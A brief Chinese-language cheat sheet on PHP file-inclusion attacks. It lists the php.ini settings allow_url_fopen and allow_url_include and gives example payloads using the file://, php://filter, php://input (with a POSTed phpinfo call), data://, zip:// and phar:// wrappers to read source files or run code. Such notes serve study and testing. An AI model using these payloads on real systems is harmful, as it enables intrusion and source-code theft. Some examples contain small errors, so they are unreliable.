1. php.ini参数设置
在 php.ini ⾥有两个重要的参数
allow_url_fopen
、allow_url_include
;
allow_url_fopen
:默认值是 ON。允许 url ⾥的封装协议访问⽂件;
allow_url_include
:默认值是 OFF,改为On。不允许包含 url ⾥的封装协议包含⽂件;
2. file://协议
使⽤:file://⽂件的绝对路径和⽂件名
3.php://filter协议
使⽤:?path=php://filter/read=convert.base64-encode/resource=⽂件.php
http://127.0.0.1/666.php?cmd=php://filter/read=convert.base64-encode/resource=666.php
4. php://input协议
?file=php://input
[POST]:<?php phpinfo()?> (执⾏POST DATA中的内容)
5. data://
使用:?file=data:text/plain,<php phpinfo();?>
6. zip://
使用:?file=zip://1.zip%231.txt
7. phar://
使用:?file=phar://1.zip/1.txt